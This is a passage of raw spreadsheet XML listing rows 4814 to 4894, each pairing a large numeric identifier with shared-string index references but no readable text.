      </c>
    </row>
    <row r="4814" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4814">
        <v>1.2344219108780101E+18</v>
      </c>
      <c r="B4814" t="s">
        <v>11956</v>
      </c>
      <c r="C4814" t="s">
        <v>1</v>
      </c>
      <c r="D4814" t="s">
        <v>11957</v>
      </c>
      <c r="E4814" t="s">
        <v>2480</v>
      </c>
    </row>
    <row r="4815" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4815">
        <v>1.23442188444545E+18</v>
      </c>
      <c r="B4815" t="s">
        <v>11958</v>
      </c>
      <c r="C4815" t="s">
        <v>1</v>
      </c>
      <c r="D4815" t="s">
        <v>11959</v>
      </c>
      <c r="E4815" t="s">
        <v>11960</v>
      </c>
    </row>
    <row r="4816" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4816">
        <v>1.2344218250036401E+18</v>
      </c>
      <c r="B4816" t="s">
        <v>11961</v>
      </c>
      <c r="C4816" t="s">
        <v>1</v>
      </c>
      <c r="D4816" t="s">
        <v>11962</v>
      </c>
      <c r="E4816" t="s">
        <v>11963</v>
      </c>
    </row>
    <row r="4817" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4817">
        <v>1.2344209228425201E+18</v>
      </c>
      <c r="B4817" t="s">
        <v>11964</v>
      </c>
      <c r="C4817" t="s">
        <v>1</v>
      </c>
      <c r="D4817" t="s">
        <v>11965</v>
      </c>
      <c r="E4817" t="s">
        <v>11966</v>
      </c>
    </row>
    <row r="4818" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4818">
        <v>1.2344207023605E+18</v>
      </c>
      <c r="B4818" t="s">
        <v>11967</v>
      </c>
      <c r="C4818" t="s">
        <v>1</v>
      </c>
      <c r="D4818" t="s">
        <v>11968</v>
      </c>
      <c r="E4818" t="s">
        <v>11969</v>
      </c>
    </row>
    <row r="4819" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4819">
        <v>1.23442057708931E+18</v>
      </c>
      <c r="B4819" t="s">
        <v>11970</v>
      </c>
      <c r="C4819" t="s">
        <v>1</v>
      </c>
      <c r="D4819" t="s">
        <v>11971</v>
      </c>
      <c r="E4819" t="s">
        <v>11972</v>
      </c>
    </row>
    <row r="4820" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4820">
        <v>1.23441959259391E+18</v>
      </c>
      <c r="B4820" t="s">
        <v>11973</v>
      </c>
      <c r="C4820" t="s">
        <v>1</v>
      </c>
      <c r="D4820" t="s">
        <v>11974</v>
      </c>
      <c r="E4820" t="s">
        <v>6362</v>
      </c>
    </row>
    <row r="4821" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4821">
        <v>1.23441846616317E+18</v>
      </c>
      <c r="B4821" t="s">
        <v>11975</v>
      </c>
      <c r="C4821" t="s">
        <v>1</v>
      </c>
      <c r="D4821" t="s">
        <v>11976</v>
      </c>
      <c r="E4821" t="s">
        <v>11977</v>
      </c>
    </row>
    <row r="4822" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4822">
        <v>1.2344183228982799E+18</v>
      </c>
      <c r="B4822" t="s">
        <v>11978</v>
      </c>
      <c r="C4822" t="s">
        <v>1</v>
      </c>
      <c r="D4822" t="s">
        <v>11979</v>
      </c>
      <c r="E4822" t="s">
        <v>9125</v>
      </c>
    </row>
    <row r="4823" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4823">
        <v>1.23441829460355E+18</v>
      </c>
      <c r="B4823" t="s">
        <v>11980</v>
      </c>
      <c r="C4823" t="s">
        <v>1</v>
      </c>
      <c r="D4823" t="s">
        <v>11981</v>
      </c>
      <c r="E4823" t="s">
        <v>1568</v>
      </c>
    </row>
    <row r="4824" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4824">
        <v>1.2344182824735201E+18</v>
      </c>
      <c r="B4824" t="s">
        <v>11982</v>
      </c>
      <c r="C4824" t="s">
        <v>1</v>
      </c>
      <c r="D4824" t="s">
        <v>11983</v>
      </c>
      <c r="E4824" t="s">
        <v>1089</v>
      </c>
    </row>
    <row r="4825" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4825">
        <v>1.2344182586332001E+18</v>
      </c>
      <c r="B4825" t="s">
        <v>11984</v>
      </c>
      <c r="C4825" t="s">
        <v>1</v>
      </c>
      <c r="D4825" t="s">
        <v>11985</v>
      </c>
      <c r="E4825" t="s">
        <v>11986</v>
      </c>
    </row>
    <row r="4826" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4826">
        <v>1.2344182115983501E+18</v>
      </c>
      <c r="B4826" t="s">
        <v>11987</v>
      </c>
      <c r="C4826" t="s">
        <v>1</v>
      </c>
      <c r="D4826" t="s">
        <v>11988</v>
      </c>
      <c r="E4826" t="s">
        <v>11989</v>
      </c>
    </row>
    <row r="4827" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4827">
        <v>1.2344182029119201E+18</v>
      </c>
      <c r="B4827" t="s">
        <v>11990</v>
      </c>
      <c r="C4827" t="s">
        <v>1</v>
      </c>
      <c r="D4827" t="s">
        <v>11991</v>
      </c>
      <c r="E4827" t="s">
        <v>6346</v>
      </c>
    </row>
    <row r="4828" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4828">
        <v>1.23441816773006E+18</v>
      </c>
      <c r="B4828" t="s">
        <v>11992</v>
      </c>
      <c r="C4828" t="s">
        <v>1</v>
      </c>
      <c r="D4828" t="s">
        <v>11993</v>
      </c>
      <c r="E4828" t="s">
        <v>11994</v>
      </c>
    </row>
    <row r="4829" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4829">
        <v>1.2344181661488699E+18</v>
      </c>
      <c r="B4829" t="s">
        <v>11995</v>
      </c>
      <c r="C4829" t="s">
        <v>1</v>
      </c>
      <c r="D4829" t="s">
        <v>11996</v>
      </c>
      <c r="E4829" t="s">
        <v>11997</v>
      </c>
    </row>
    <row r="4830" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4830">
        <v>1.2344181579823601E+18</v>
      </c>
      <c r="B4830" t="s">
        <v>11998</v>
      </c>
      <c r="C4830" t="s">
        <v>1</v>
      </c>
      <c r="D4830" t="s">
        <v>11999</v>
      </c>
      <c r="E4830" t="s">
        <v>1089</v>
      </c>
    </row>
    <row r="4831" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4831">
        <v>1.23441804583085E+18</v>
      </c>
      <c r="B4831" t="s">
        <v>12000</v>
      </c>
      <c r="C4831" t="s">
        <v>1</v>
      </c>
      <c r="D4831" t="s">
        <v>12001</v>
      </c>
      <c r="E4831" t="s">
        <v>1089</v>
      </c>
    </row>
    <row r="4832" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4832">
        <v>1.23441793562557E+18</v>
      </c>
      <c r="B4832" t="s">
        <v>12002</v>
      </c>
      <c r="C4832" t="s">
        <v>1</v>
      </c>
      <c r="D4832" t="s">
        <v>12003</v>
      </c>
      <c r="E4832" t="s">
        <v>1089</v>
      </c>
    </row>
    <row r="4833" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4833">
        <v>1.2344177804992799E+18</v>
      </c>
      <c r="B4833" t="s">
        <v>12004</v>
      </c>
      <c r="C4833" t="s">
        <v>1</v>
      </c>
      <c r="D4833" t="s">
        <v>12005</v>
      </c>
      <c r="E4833" t="s">
        <v>1089</v>
      </c>
    </row>
    <row r="4834" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4834">
        <v>1.2344176569056399E+18</v>
      </c>
      <c r="B4834" t="s">
        <v>12006</v>
      </c>
      <c r="C4834" t="s">
        <v>1</v>
      </c>
      <c r="D4834" t="s">
        <v>12007</v>
      </c>
      <c r="E4834" t="s">
        <v>1089</v>
      </c>
    </row>
    <row r="4835" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4835">
        <v>1.2344175005589701E+18</v>
      </c>
      <c r="B4835" t="s">
        <v>12008</v>
      </c>
      <c r="C4835" t="s">
        <v>1</v>
      </c>
      <c r="D4835" t="s">
        <v>12009</v>
      </c>
      <c r="E4835" t="s">
        <v>6376</v>
      </c>
    </row>
    <row r="4836" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4836">
        <v>1.2344170011682801E+18</v>
      </c>
      <c r="B4836" t="s">
        <v>12010</v>
      </c>
      <c r="C4836" t="s">
        <v>1</v>
      </c>
      <c r="D4836" t="s">
        <v>12011</v>
      </c>
      <c r="E4836" t="s">
        <v>12012</v>
      </c>
    </row>
    <row r="4837" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4837">
        <v>1.2344169589776699E+18</v>
      </c>
      <c r="B4837" t="s">
        <v>12013</v>
      </c>
      <c r="C4837" t="s">
        <v>1</v>
      </c>
      <c r="D4837" t="s">
        <v>12014</v>
      </c>
      <c r="E4837" t="s">
        <v>1089</v>
      </c>
    </row>
    <row r="4838" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4838">
        <v>1.2344167131494899E+18</v>
      </c>
      <c r="B4838" t="s">
        <v>12015</v>
      </c>
      <c r="C4838" t="s">
        <v>1</v>
      </c>
      <c r="D4838" t="s">
        <v>12016</v>
      </c>
      <c r="E4838" t="s">
        <v>1089</v>
      </c>
    </row>
    <row r="4839" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4839">
        <v>1.23441545556302E+18</v>
      </c>
      <c r="B4839" t="s">
        <v>12017</v>
      </c>
      <c r="C4839" t="s">
        <v>1</v>
      </c>
      <c r="D4839" t="s">
        <v>12018</v>
      </c>
      <c r="E4839" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="4840" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4840">
        <v>1.2344149410938801E+18</v>
      </c>
      <c r="B4840" t="s">
        <v>12019</v>
      </c>
      <c r="C4840" t="s">
        <v>1</v>
      </c>
      <c r="D4840" t="s">
        <v>12020</v>
      </c>
      <c r="E4840" t="s">
        <v>153</v>
      </c>
    </row>
    <row r="4841" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4841">
        <v>1.2344138335416901E+18</v>
      </c>
      <c r="B4841" t="s">
        <v>12021</v>
      </c>
      <c r="C4841" t="s">
        <v>1</v>
      </c>
      <c r="D4841" t="s">
        <v>12022</v>
      </c>
      <c r="E4841" t="s">
        <v>12023</v>
      </c>
    </row>
    <row r="4842" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4842">
        <v>1.2344136124138701E+18</v>
      </c>
      <c r="B4842" t="s">
        <v>12024</v>
      </c>
      <c r="C4842" t="s">
        <v>1</v>
      </c>
      <c r="D4842" t="s">
        <v>12025</v>
      </c>
      <c r="E4842" t="s">
        <v>6315</v>
      </c>
    </row>
    <row r="4843" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4843">
        <v>1.2344133913236401E+18</v>
      </c>
      <c r="B4843" t="s">
        <v>12026</v>
      </c>
      <c r="C4843" t="s">
        <v>1</v>
      </c>
      <c r="D4843" t="s">
        <v>12027</v>
      </c>
      <c r="E4843" t="s">
        <v>12028</v>
      </c>
    </row>
    <row r="4844" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4844">
        <v>1.23441188815233E+18</v>
      </c>
      <c r="B4844" t="s">
        <v>12029</v>
      </c>
      <c r="C4844" t="s">
        <v>1</v>
      </c>
      <c r="D4844" t="s">
        <v>12030</v>
      </c>
      <c r="E4844" t="s">
        <v>8740</v>
      </c>
    </row>
    <row r="4845" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4845">
        <v>1.23441135194415E+18</v>
      </c>
      <c r="B4845" t="s">
        <v>12031</v>
      </c>
      <c r="C4845" t="s">
        <v>1</v>
      </c>
      <c r="D4845" t="s">
        <v>12032</v>
      </c>
      <c r="E4845" t="s">
        <v>251</v>
      </c>
    </row>
    <row r="4846" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4846">
        <v>1.23441062357392E+18</v>
      </c>
      <c r="B4846" t="s">
        <v>12033</v>
      </c>
      <c r="C4846" t="s">
        <v>1</v>
      </c>
      <c r="D4846" t="s">
        <v>12034</v>
      </c>
      <c r="E4846" t="s">
        <v>12035</v>
      </c>
    </row>
    <row r="4847" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4847">
        <v>1.23440873316318E+18</v>
      </c>
      <c r="B4847" t="s">
        <v>12036</v>
      </c>
      <c r="C4847" t="s">
        <v>1</v>
      </c>
      <c r="D4847" t="s">
        <v>12037</v>
      </c>
      <c r="E4847" t="s">
        <v>6223</v>
      </c>
    </row>
    <row r="4848" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4848">
        <v>1.2344087254835699E+18</v>
      </c>
      <c r="B4848" t="s">
        <v>12038</v>
      </c>
      <c r="C4848" t="s">
        <v>1</v>
      </c>
      <c r="D4848" t="s">
        <v>12039</v>
      </c>
      <c r="E4848" t="s">
        <v>12040</v>
      </c>
    </row>
    <row r="4849" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4849">
        <v>1.23440866283725E+18</v>
      </c>
      <c r="B4849" t="s">
        <v>12041</v>
      </c>
      <c r="C4849" t="s">
        <v>1</v>
      </c>
      <c r="D4849" t="s">
        <v>12042</v>
      </c>
      <c r="E4849" t="s">
        <v>6397</v>
      </c>
    </row>
    <row r="4850" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4850">
        <v>1.2344086230418501E+18</v>
      </c>
      <c r="B4850" t="s">
        <v>12043</v>
      </c>
      <c r="C4850" t="s">
        <v>1</v>
      </c>
      <c r="D4850" t="s">
        <v>12044</v>
      </c>
      <c r="E4850" t="s">
        <v>12045</v>
      </c>
    </row>
    <row r="4851" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4851">
        <v>1.2344084087087301E+18</v>
      </c>
      <c r="B4851" t="s">
        <v>12046</v>
      </c>
      <c r="C4851" t="s">
        <v>1</v>
      </c>
      <c r="D4851" t="s">
        <v>12047</v>
      </c>
      <c r="E4851" t="s">
        <v>12048</v>
      </c>
    </row>
    <row r="4852" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4852">
        <v>1.2344083872127401E+18</v>
      </c>
      <c r="B4852" t="s">
        <v>12049</v>
      </c>
      <c r="C4852" t="s">
        <v>1</v>
      </c>
      <c r="D4852" t="s">
        <v>12050</v>
      </c>
      <c r="E4852" t="s">
        <v>6397</v>
      </c>
    </row>
    <row r="4853" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4853">
        <v>1.2344081782485601E+18</v>
      </c>
      <c r="B4853" t="s">
        <v>12051</v>
      </c>
      <c r="C4853" t="s">
        <v>1</v>
      </c>
      <c r="D4853" t="s">
        <v>12052</v>
      </c>
      <c r="E4853" t="s">
        <v>3375</v>
      </c>
    </row>
    <row r="4854" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4854">
        <v>1.23440810056144E+18</v>
      </c>
      <c r="B4854" t="s">
        <v>12053</v>
      </c>
      <c r="C4854" t="s">
        <v>1</v>
      </c>
      <c r="D4854" t="s">
        <v>12054</v>
      </c>
      <c r="E4854" t="s">
        <v>6397</v>
      </c>
    </row>
    <row r="4855" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4855">
        <v>1.2344070883794401E+18</v>
      </c>
      <c r="B4855" t="s">
        <v>12055</v>
      </c>
      <c r="C4855" t="s">
        <v>1</v>
      </c>
      <c r="D4855" t="s">
        <v>12056</v>
      </c>
      <c r="E4855" t="s">
        <v>12057</v>
      </c>
    </row>
    <row r="4856" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4856">
        <v>1.23440700081934E+18</v>
      </c>
      <c r="B4856" t="s">
        <v>12058</v>
      </c>
      <c r="C4856" t="s">
        <v>1</v>
      </c>
      <c r="D4856" t="s">
        <v>12059</v>
      </c>
      <c r="E4856" t="s">
        <v>12060</v>
      </c>
    </row>
    <row r="4857" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4857">
        <v>1.23440677833247E+18</v>
      </c>
      <c r="B4857" t="s">
        <v>12061</v>
      </c>
      <c r="C4857" t="s">
        <v>1</v>
      </c>
      <c r="D4857" t="s">
        <v>12062</v>
      </c>
      <c r="E4857" t="s">
        <v>7427</v>
      </c>
    </row>
    <row r="4858" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4858">
        <v>1.2344065090998999E+18</v>
      </c>
      <c r="B4858" t="s">
        <v>12063</v>
      </c>
      <c r="C4858" t="s">
        <v>1</v>
      </c>
      <c r="D4858" t="s">
        <v>12064</v>
      </c>
      <c r="E4858" t="s">
        <v>12065</v>
      </c>
    </row>
    <row r="4859" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4859">
        <v>1.2344057450866601E+18</v>
      </c>
      <c r="B4859" t="s">
        <v>12066</v>
      </c>
      <c r="C4859" t="s">
        <v>1</v>
      </c>
      <c r="D4859" t="s">
        <v>12067</v>
      </c>
      <c r="E4859" t="s">
        <v>11335</v>
      </c>
    </row>
    <row r="4860" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4860">
        <v>1.23440559545906E+18</v>
      </c>
      <c r="B4860" t="s">
        <v>12068</v>
      </c>
      <c r="C4860" t="s">
        <v>1</v>
      </c>
      <c r="D4860" t="s">
        <v>12069</v>
      </c>
      <c r="E4860" t="s">
        <v>1926</v>
      </c>
    </row>
    <row r="4861" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4861">
        <v>1.2344054454287501E+18</v>
      </c>
      <c r="B4861" t="s">
        <v>12070</v>
      </c>
      <c r="C4861" t="s">
        <v>1</v>
      </c>
      <c r="D4861" t="s">
        <v>12071</v>
      </c>
      <c r="E4861" t="s">
        <v>3375</v>
      </c>
    </row>
    <row r="4862" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4862">
        <v>1.23440515683966E+18</v>
      </c>
      <c r="B4862" t="s">
        <v>12072</v>
      </c>
      <c r="C4862" t="s">
        <v>1</v>
      </c>
      <c r="D4862" t="s">
        <v>12073</v>
      </c>
      <c r="E4862" t="s">
        <v>12074</v>
      </c>
    </row>
    <row r="4863" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4863">
        <v>1.2344046336506299E+18</v>
      </c>
      <c r="B4863" t="s">
        <v>12075</v>
      </c>
      <c r="C4863" t="s">
        <v>1</v>
      </c>
      <c r="D4863" t="s">
        <v>4360</v>
      </c>
      <c r="E4863" t="s">
        <v>3948</v>
      </c>
    </row>
    <row r="4864" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4864">
        <v>1.2344044815482199E+18</v>
      </c>
      <c r="B4864" t="s">
        <v>12076</v>
      </c>
      <c r="C4864" t="s">
        <v>1</v>
      </c>
      <c r="D4864" t="s">
        <v>12077</v>
      </c>
      <c r="E4864" t="s">
        <v>11423</v>
      </c>
    </row>
    <row r="4865" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4865">
        <v>1.23440435982128E+18</v>
      </c>
      <c r="B4865" t="s">
        <v>12078</v>
      </c>
      <c r="C4865" t="s">
        <v>1</v>
      </c>
      <c r="D4865" t="s">
        <v>12079</v>
      </c>
      <c r="E4865" t="s">
        <v>6474</v>
      </c>
    </row>
    <row r="4866" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4866">
        <v>1.2344041717275599E+18</v>
      </c>
      <c r="B4866" t="s">
        <v>12080</v>
      </c>
      <c r="C4866" t="s">
        <v>1</v>
      </c>
      <c r="D4866" t="s">
        <v>12081</v>
      </c>
      <c r="E4866" t="s">
        <v>12082</v>
      </c>
    </row>
    <row r="4867" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4867">
        <v>1.23440407506576E+18</v>
      </c>
      <c r="B4867" t="s">
        <v>12083</v>
      </c>
      <c r="C4867" t="s">
        <v>1</v>
      </c>
      <c r="D4867" t="s">
        <v>12084</v>
      </c>
      <c r="E4867" t="s">
        <v>236</v>
      </c>
    </row>
    <row r="4868" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4868">
        <v>1.23440334830191E+18</v>
      </c>
      <c r="B4868" t="s">
        <v>12085</v>
      </c>
      <c r="C4868" t="s">
        <v>1</v>
      </c>
      <c r="D4868" t="s">
        <v>12086</v>
      </c>
      <c r="E4868" t="s">
        <v>12087</v>
      </c>
    </row>
    <row r="4869" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4869">
        <v>1.2344033126965399E+18</v>
      </c>
      <c r="B4869" t="s">
        <v>12088</v>
      </c>
      <c r="C4869" t="s">
        <v>1</v>
      </c>
      <c r="D4869" t="s">
        <v>12089</v>
      </c>
      <c r="E4869" t="s">
        <v>12090</v>
      </c>
    </row>
    <row r="4870" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4870">
        <v>1.2344032393674399E+18</v>
      </c>
      <c r="B4870" t="s">
        <v>12091</v>
      </c>
      <c r="C4870" t="s">
        <v>1</v>
      </c>
      <c r="D4870" t="s">
        <v>12092</v>
      </c>
      <c r="E4870" t="s">
        <v>12093</v>
      </c>
    </row>
    <row r="4871" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4871">
        <v>1.2344031526794299E+18</v>
      </c>
      <c r="B4871" t="s">
        <v>12094</v>
      </c>
      <c r="C4871" t="s">
        <v>1</v>
      </c>
      <c r="D4871" t="s">
        <v>12095</v>
      </c>
      <c r="E4871" t="s">
        <v>251</v>
      </c>
    </row>
    <row r="4872" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4872">
        <v>1.2344031464887401E+18</v>
      </c>
      <c r="B4872" t="s">
        <v>12096</v>
      </c>
      <c r="C4872" t="s">
        <v>1</v>
      </c>
      <c r="D4872" t="s">
        <v>12097</v>
      </c>
      <c r="E4872" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="4873" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4873">
        <v>1.23440312257712E+18</v>
      </c>
      <c r="B4873" t="s">
        <v>12098</v>
      </c>
      <c r="C4873" t="s">
        <v>1</v>
      </c>
      <c r="D4873" t="s">
        <v>12099</v>
      </c>
      <c r="E4873" t="s">
        <v>12100</v>
      </c>
    </row>
    <row r="4874" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4874">
        <v>1.2344031149057201E+18</v>
      </c>
      <c r="B4874" t="s">
        <v>12101</v>
      </c>
      <c r="C4874" t="s">
        <v>1</v>
      </c>
      <c r="D4874" t="s">
        <v>12102</v>
      </c>
      <c r="E4874" t="s">
        <v>12103</v>
      </c>
    </row>
    <row r="4875" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4875">
        <v>1.23440307730797E+18</v>
      </c>
      <c r="B4875" t="s">
        <v>12104</v>
      </c>
      <c r="C4875" t="s">
        <v>1</v>
      </c>
      <c r="D4875" t="s">
        <v>12105</v>
      </c>
      <c r="E4875" t="s">
        <v>111</v>
      </c>
    </row>
    <row r="4876" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4876">
        <v>1.23440307079824E+18</v>
      </c>
      <c r="B4876" t="s">
        <v>12106</v>
      </c>
      <c r="C4876" t="s">
        <v>1</v>
      </c>
      <c r="D4876" t="s">
        <v>12107</v>
      </c>
      <c r="E4876" t="s">
        <v>12108</v>
      </c>
    </row>
    <row r="4877" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4877">
        <v>1.23440279558913E+18</v>
      </c>
      <c r="B4877" t="s">
        <v>12109</v>
      </c>
      <c r="C4877" t="s">
        <v>1</v>
      </c>
      <c r="D4877" t="s">
        <v>12110</v>
      </c>
      <c r="E4877" t="s">
        <v>384</v>
      </c>
    </row>
    <row r="4878" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4878">
        <v>1.23440241465823E+18</v>
      </c>
      <c r="B4878" t="s">
        <v>12111</v>
      </c>
      <c r="C4878" t="s">
        <v>1</v>
      </c>
      <c r="D4878" t="s">
        <v>12112</v>
      </c>
      <c r="E4878" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="4879" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4879">
        <v>1.23440241263665E+18</v>
      </c>
      <c r="B4879" t="s">
        <v>12113</v>
      </c>
      <c r="C4879" t="s">
        <v>1</v>
      </c>
      <c r="D4879" t="s">
        <v>12114</v>
      </c>
      <c r="E4879" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="4880" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4880">
        <v>1.23440188964461E+18</v>
      </c>
      <c r="B4880" t="s">
        <v>12115</v>
      </c>
      <c r="C4880" t="s">
        <v>1</v>
      </c>
      <c r="D4880" t="s">
        <v>12116</v>
      </c>
      <c r="E4880" t="s">
        <v>12117</v>
      </c>
    </row>
    <row r="4881" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4881">
        <v>1.2343999929928E+18</v>
      </c>
      <c r="B4881" t="s">
        <v>12118</v>
      </c>
      <c r="C4881" t="s">
        <v>1</v>
      </c>
      <c r="D4881" t="s">
        <v>12119</v>
      </c>
      <c r="E4881" t="s">
        <v>3100</v>
      </c>
    </row>
    <row r="4882" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4882">
        <v>1.23439982748977E+18</v>
      </c>
      <c r="B4882" t="s">
        <v>12120</v>
      </c>
      <c r="C4882" t="s">
        <v>1</v>
      </c>
      <c r="D4882" t="s">
        <v>12121</v>
      </c>
      <c r="E4882" t="s">
        <v>4644</v>
      </c>
    </row>
    <row r="4883" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4883">
        <v>1.2343993212416499E+18</v>
      </c>
      <c r="B4883" t="s">
        <v>12122</v>
      </c>
      <c r="C4883" t="s">
        <v>1</v>
      </c>
      <c r="D4883" t="s">
        <v>12123</v>
      </c>
      <c r="E4883" t="s">
        <v>1926</v>
      </c>
    </row>
    <row r="4884" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4884">
        <v>1.23439677680048E+18</v>
      </c>
      <c r="B4884" t="s">
        <v>12124</v>
      </c>
      <c r="C4884" t="s">
        <v>1</v>
      </c>
      <c r="D4884" t="s">
        <v>12125</v>
      </c>
      <c r="E4884" t="s">
        <v>12126</v>
      </c>
    </row>
    <row r="4885" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4885">
        <v>1.23439675914686E+18</v>
      </c>
      <c r="B4885" t="s">
        <v>12127</v>
      </c>
      <c r="C4885" t="s">
        <v>1</v>
      </c>
      <c r="D4885" t="s">
        <v>12128</v>
      </c>
      <c r="E4885" t="s">
        <v>2720</v>
      </c>
    </row>
    <row r="4886" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4886">
        <v>1.2343965237414799E+18</v>
      </c>
      <c r="B4886" t="s">
        <v>12129</v>
      </c>
      <c r="C4886" t="s">
        <v>1</v>
      </c>
      <c r="D4886" t="s">
        <v>12130</v>
      </c>
      <c r="E4886" t="s">
        <v>3461</v>
      </c>
    </row>
    <row r="4887" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4887">
        <v>1.23439613393969E+18</v>
      </c>
      <c r="B4887" t="s">
        <v>12131</v>
      </c>
      <c r="C4887" t="s">
        <v>1</v>
      </c>
      <c r="D4887" t="s">
        <v>12132</v>
      </c>
      <c r="E4887" t="s">
        <v>12133</v>
      </c>
    </row>
    <row r="4888" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4888">
        <v>1.23439586248014E+18</v>
      </c>
      <c r="B4888" t="s">
        <v>12134</v>
      </c>
      <c r="C4888" t="s">
        <v>1</v>
      </c>
      <c r="D4888" t="s">
        <v>12135</v>
      </c>
      <c r="E4888" t="s">
        <v>1665</v>
      </c>
    </row>
    <row r="4889" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4889">
        <v>1.23439464234448E+18</v>
      </c>
      <c r="B4889" t="s">
        <v>12136</v>
      </c>
      <c r="C4889" t="s">
        <v>1</v>
      </c>
      <c r="D4889" t="s">
        <v>12137</v>
      </c>
      <c r="E4889" t="s">
        <v>12138</v>
      </c>
    </row>
    <row r="4890" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4890">
        <v>1.23439430672893E+18</v>
      </c>
      <c r="B4890" t="s">
        <v>12139</v>
      </c>
      <c r="C4890" t="s">
        <v>1</v>
      </c>
      <c r="D4890" t="s">
        <v>12140</v>
      </c>
      <c r="E4890" t="s">
        <v>12141</v>
      </c>
    </row>
    <row r="4891" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4891">
        <v>1.23439429496385E+18</v>
      </c>
      <c r="B4891" t="s">
        <v>12142</v>
      </c>
      <c r="C4891" t="s">
        <v>1</v>
      </c>
      <c r="D4891" t="s">
        <v>12143</v>
      </c>
      <c r="E4891" t="s">
        <v>12144</v>
      </c>
    </row>
    <row r="4892" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4892">
        <v>1.2343942735267599E+18</v>
      </c>
      <c r="B4892" t="s">
        <v>12145</v>
      </c>
      <c r="C4892" t="s">
        <v>1</v>
      </c>
      <c r="D4892" t="s">
        <v>12146</v>
      </c>
      <c r="E4892" t="s">
        <v>12147</v>
      </c>
    </row>
    <row r="4893" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4893">
        <v>1.2343942732163699E+18</v>
      </c>
      <c r="B4893" t="s">
        <v>12145</v>
      </c>
      <c r="C4893" t="s">
        <v>1</v>
      </c>
      <c r="D4893" t="s">
        <v>12148</v>
      </c>
      <c r="E4893" t="s">
        <v>1926</v>
      </c>
    </row>
    <row r="4894" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4894">
        <v>1.2343941532844401E+18</v>
      </c>
      <c r="B4894" t="s">
        <v>12149</v>
      </c>
      <c r="C4894" t="s">
        <v>1</v>
      </c>
      <c r="D4894" t="s">
        <v>12150</v>
      </c>
      <c r="E4894" t="s">
        <v>120</v>
      </c>
    </row>
    <row r="4895" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4895">
